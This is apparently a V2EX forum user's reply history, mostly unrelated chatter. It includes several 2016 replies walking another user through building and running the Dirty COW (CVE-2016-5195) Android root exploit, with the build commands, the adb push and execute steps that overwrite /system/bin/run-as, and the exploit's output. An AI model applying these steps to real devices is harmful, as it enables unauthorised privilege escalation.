V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  michaelzhou  ›  全部回复第 1 页 / 共 2 页
回复总数  25
1  2  
2022-02-08 13:43:48 +08:00
回复了 KIRAYOMATO 创建的主题 程序员 有通过深度学习来提升音质的工具吗?
音频有环境声降噪、人声突出增强等等。
2022-01-26 10:49:51 +08:00
回复了 michaelzhou 创建的主题 酷工作 [内推] TikTok 招聘 Android/iOS/golang 后端
@sugarh 可以加我的微信或者飞书,我简单介绍一下~
2022-01-25 10:41:48 +08:00
回复了 michaelzhou 创建的主题 酷工作 [内推] TikTok 招聘 Android/iOS/golang 后端
@dangyuluo hello ,抱歉给你造成了很差的体验,上述面试官的确没有遵守公司的面试礼仪,后续我会向内部团队反馈并核实是否是我们团队的同学;再次表达抱歉~
2017-02-15 14:37:15 +08:00
回复了 LancerXin 创建的主题 Android 探讨一个关于 Android Support 修改的问题
有个不是很优雅的办法,但至少能解决你的问题:

在那之前把那个 xml 直接给替换掉

Field field = MenuPopupHelper.class.getDeclaredField("ITEM_LAYOUT");
field.setAccessible(true);
field.set(null, R.layout.custom_popup_menu_item_layout);
2016-12-29 13:18:03 +08:00
回复了 Grumpy 创建的主题 问与答 年会礼物
PSVR 啊!
2016-11-03 21:28:22 +08:00
回复了 postlive 创建的主题 Android 安卓开发高手帮忙看一下
2016-11-03 14:41:44 +08:00
回复了 postlive 创建的主题 Android 安卓开发高手帮忙看一下
@postlive 另外几个一直报错,不知为何,我没仔细看错误原因。
粗看一下,大概是因为引用的头文件在源码环境下才有,我个人电脑的环境没有 AOSP 的源码编译环境,只能帮你到这里了。
2016-11-03 13:42:16 +08:00
回复了 postlive 创建的主题 Android 安卓开发高手帮忙看一下
@postlive 已发。
2016-11-02 18:49:53 +08:00
回复了 postlive 创建的主题 Android 安卓开发高手帮忙看一下
@postlive 已发
2016-11-02 18:13:03 +08:00
回复了 postlive 创建的主题 Android 安卓开发高手帮忙看一下
@postlive 将 Git 仓库放到你自己的 ndk 目录的 sources 目录下,然后用 ndk-build 命令进行编译。建议将 ndk-build 可执行文件的路径添加到 PATH 。编译时找不到头文件,及有可能是你的项目放的目录不对。

例如,我放的目录是:

~/Library/Android/sdk/ndk-bundle/sources/third_party/CVE-2016-5195

然后,你给出的这个 Github 仓库,作者已经写好了 Makefile ,所以直接用 make 命令就可以直接编译。
也就是说,在 ~/Library/Android/sdk/ndk-bundle/sources/third_party/CVE-2016-5195 下 执行 make root 。

敲完 make root 后,就可以 “坐和放宽” 了。

FYI :编译以后的 output 在 ./libs 和 ./obj 目录下。
2016-10-31 17:41:34 +08:00
回复了 postlive 创建的主题 Android 安卓开发高手帮忙看一下
@postlive 是。
2016-10-31 17:32:14 +08:00
回复了 postlive 创建的主题 Android 安卓开发高手帮忙看一下
@postlive 可以这么理解。但是 “想办法用这个 run-as 替换 system/bin/的” 很难。
2016-10-31 17:02:11 +08:00
回复了 postlive 创建的主题 Android 安卓开发高手帮忙看一下
@postlive 系统分配给 adb 的 uid ,是没有权限更改 /system/bin 下任何东西的,/data/local/tmp 下的东西可以随便来,所以,首先将 exploit 所需要的东西先拷贝到 /data/local/tmp/,然后 dirtycow 将 /system/bin/run-as 替换成 /data/local/tmp/run-as 。然后被替换的 run-as 就可以被 APK 应用层直接调用了( run-as --uid root )。
2016-10-31 16:57:05 +08:00
回复了 postlive 创建的主题 Android 安卓开发高手帮忙看一下
@postlive 首先你得理解这个 CVE 提权的过程。重点在 dirtycow ,他是 exploit 的执行者,目的是将系统的 run-as 替换成自己编写的 run-as 。
2016-10-31 15:49:09 +08:00
回复了 postlive 创建的主题 Android 安卓开发高手帮忙看一下
用 ndk 编译完成, push 到手机使用 adb shell 执行:
$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
[arm64-v8a] Install : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install : run-as => libs/arm64-v8a/run-as
[x86_64] Install : dirtycow => libs/x86_64/dirtycow
[x86_64] Install : run-as => libs/x86_64/run-as
[mips64] Install : dirtycow => libs/mips64/dirtycow
[mips64] Install : run-as => libs/mips64/run-as
[armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Compile thumb : run-as <= run-as.c
[armeabi-v7a] Executable : run-as
[armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as
[armeabi] Compile thumb : dirtycow <= dirtycow.c
[armeabi] Executable : dirtycow
[armeabi] Install : dirtycow => libs/armeabi/dirtycow
[armeabi] Compile thumb : run-as <= run-as.c
[armeabi] Executable : run-as
[armeabi] Install : run-as => libs/armeabi/run-as
[x86] Compile : dirtycow <= dirtycow.c
[x86] Executable : dirtycow
[x86] Install : dirtycow => libs/x86/dirtycow
[x86] Compile : run-as <= run-as.c
[x86] Executable : run-as
[x86] Install : run-as => libs/x86/run-as
[mips] Compile : dirtycow <= dirtycow.c
[mips] Executable : dirtycow
[mips] Install : dirtycow => libs/mips/dirtycow
[mips] Compile : run-as <= run-as.c
[mips] Executable : run-as
[mips] Install : run-as => libs/mips/run-as
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
[100%] /data/local/tmp/dirtycow
adb push libs/armeabi/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
warning: new file size (13776) and file old size (14192) differ

size 14192


[*] mmap 0xf707c000
[*] exploit (patch)
[*] currently 0xf707c000=464c457f
[*] madvise = 0xf707c000 14192
[*] madvise = 0 1048576
[*] /proc/self/mem -1048576 1048576
[*] exploited 0xf707c000=464c457f
adb shell /system/bin/run-as
run-as: Usage:
run-as <package-name> [--user <uid>] <command> [<args>]
2016-10-31 15:42:57 +08:00
回复了 postlive 创建的主题 Android 安卓开发高手帮忙看一下
看了一下 makefile ,编译完成应该会有两个 so 文件,不会生成 APK 文件,你需要编写一个 Android Project ,然后通过 JNI 来调用。
2016-10-26 10:43:50 +08:00
回复了 akiossdev 创建的主题 小米 只有我觉得小米 MIX 好看吗
我也觉得黑色的 MIX 很好看,但是白色就觉得很不和谐。
2016-10-26 10:39:38 +08:00
回复了 hkalexyeung 创建的主题 程序员 分享一下站着办公
看图片上的楼主,头是往下看的啊,小心颈椎...可以把屏幕调高一些。
1  2  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3355 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 22ms · UTC 00:07 · PVG 08:07 · LAX 16:07 · JFK 19:07
Developed with CodeLauncher
♥ Do have faith in what you're doing.